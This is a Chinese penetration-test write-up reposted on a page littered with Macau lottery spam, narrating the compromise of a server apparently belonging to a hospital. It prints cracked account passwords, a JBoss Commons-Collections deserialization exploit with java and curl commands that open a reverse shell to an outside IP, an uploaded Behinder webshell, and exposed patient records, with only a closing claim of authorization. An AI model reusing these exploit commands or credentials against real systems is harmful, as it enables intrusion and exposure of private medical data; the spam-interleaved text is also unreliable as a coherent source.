澳门六合开奖结果-澳门金六彩开奖结果-澳门三合图库资料大全

您的位置:主页 > 文章 >
文章

记一次渗透实战

2020-05-15作者:睡觉来源:次阅读

文章来源:Sec盾

目标:http://xxx.xx.xxx.xxx:9002/xxx/xxm/login.php

 

访问目标

记一次渗透实战

 

澳门六合开奖结果-澳门金六彩开奖结果-澳门三合图库资料大全 此时此刻,拿出我们拿出好兄弟burp来抓包,看下响应包

记一次渗透实战

 

澳门六合开奖结果-澳门金六彩开奖结果-澳门三合图库资料大全  

尝试枚举,看能不能碰到狗屎运

澳门六合开奖结果-澳门金六彩开奖结果-澳门三合图库资料大全  

跑中国人名字典,无结果,表示今天运气不行啊

记一次渗透实战

 

 

澳门六合开奖结果-澳门金六彩开奖结果-澳门三合图库资料大全 废话不多说继续!!!

 

常规操作 ,对目标目录进行删减 ,发现了目录遍历的

澳门六合开奖结果-澳门金六彩开奖结果-澳门三合图库资料大全  

http://xxx.xx.xxx.xx:9002/xxxying/

澳门六合开奖结果-澳门金六彩开奖结果-澳门三合图库资料大全  

记一次渗透实战

澳门六合开奖结果-澳门金六彩开奖结果-澳门三合图库资料大全  

尝试能不能获取有用的信息

 

随意点击,爆出路径,为后面上传webshell 做铺垫

记一次渗透实战

澳门六合开奖结果-澳门金六彩开奖结果-澳门三合图库资料大全  

之后发现了库的文件

记一次渗透实战

澳门六合开奖结果-澳门金六彩开奖结果-澳门三合图库资料大全  

 

发现了两个账号

澳门六合开奖结果-澳门金六彩开奖结果-澳门三合图库资料大全  

http://xxx.xx.xxx.xx:9002/xxxxxx/tdb.20xxx129.sql

 

还发现了两个账号

澳门六合开奖结果-澳门金六彩开奖结果-澳门三合图库资料大全  

记一次渗透实战

澳门六合开奖结果-澳门金六彩开奖结果-澳门三合图库资料大全  

对密码进行解密

记一次渗透实战

记一次渗透实战

 

admin/12345678

澳门六合开奖结果-澳门金六彩开奖结果-澳门三合图库资料大全  

coolfd/shj811004

澳门六合开奖结果-澳门金六彩开奖结果-澳门三合图库资料大全  

获得两个账号 ,尝试登陆

澳门六合开奖结果-澳门金六彩开奖结果-澳门三合图库资料大全  

发现两个账号不可用 ,可能是另外一个系统的吧   

 

继续搞呗

 

找到一个网站

http://www.xxxxxxx.cc/index.html

 

试试有没有后台

http://www.xxxxxxx.cc/admin/login.php#

 

http://www.xxxxx.com/

 

 

http://www.xxxxxxx.com/admin/login.php#

澳门六合开奖结果-澳门金六彩开奖结果-澳门三合图库资料大全  

尝试登陆后台 ,发现coolfd账号可用

记一次渗透实战

澳门六合开奖结果-澳门金六彩开奖结果-澳门三合图库资料大全  

登陆后台了

 

尝试找上传点

 

上传多次无果

 

/mxxxxtor/atxxxxd/image/20xxx923/20140xxxx11623_39094.jpg

 

多处

记一次渗透实战

 

没有写权限

记一次渗透实战

 

多处上传失败 

 

只能搞ip

 

对目标ip进行端口扫描

 

记一次渗透实战

澳门六合开奖结果-澳门金六彩开奖结果-澳门三合图库资料大全  

逐个访问,发现了jboss

 

http://xxx.xx.xxx.xx:9080/

 

想到jboss 反序列化

 

记一次渗透实战

 

在网上找了反序列化的exp

 

payload生成好了,直接使用

 

java -cp .:commons-collections-3.2.1.jar  ReverseShellCommonsCollectionsHashMap 182.92.*.* 7777

 

监听端口

澳门六合开奖结果-澳门金六彩开奖结果-澳门三合图库资料大全  

记一次渗透实战

澳门六合开奖结果-澳门金六彩开奖结果-澳门三合图库资料大全  

curl  http://xxx.xx.x.xx:9080/ixxxxx/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

向目标路径 /invoker/readonly  

记一次渗透实战

即可拿到目标的最高权限

 

找到网站路径

 

发现了PHPinfo探针

 

http://xxx.xx.xxx.xx:9002/phpinfo.php

记一次渗透实战

好像无法使用命令

 

Curl wget  

 

只能用打包好的工具上传webshell了

 

6哥工具执行好像乱码了

澳门六合开奖结果-澳门金六彩开奖结果-澳门三合图库资料大全  

记一次渗透实战

只好上传冰蝎上去

澳门六合开奖结果-澳门金六彩开奖结果-澳门三合图库资料大全  

知道路径 直接上传

 

记一次渗透实战

 

为了便于管理,上传一个webshell

记一次渗透实战

 

在文件管理看到了库文件

记一次渗透实战

 

发现了账号和密码

记一次渗透实战

解密成功,后台登陆成功

记一次渗透实战

 

看起来是医院的系统

记一次渗透实战

澳门六合开奖结果-澳门金六彩开奖结果-澳门三合图库资料大全  

个人病例信息大量泄露

记一次渗透实战

 

http://xxx.xx.x.xx:9002/zhxxxxg/rxxpg/35735xxxxx80%94369773.jpg

 

部分报告单泄露

 

为了安全起见,将已经删除了

 

似乎存在域环境

 

可惜自己菜 ,未敢深入

澳门六合开奖结果-澳门金六彩开奖结果-澳门三合图库资料大全  

记一次渗透实战

 

记一次渗透实战

澳门六合开奖结果-澳门金六彩开奖结果-澳门三合图库资料大全  

到这里就结束了,授权项目,如有打码不规范,请勿私自渗透,违者后果自负

本文由 华盟网 作者: 发表,其版权均为 华盟网 所有,文章内容系作者个人观点,不代表 华盟网 对观点赞同或支持。如需转载,请注明文章来源。    

记一次渗透实战 相关的内容:

关于 记一次渗透实战 的评论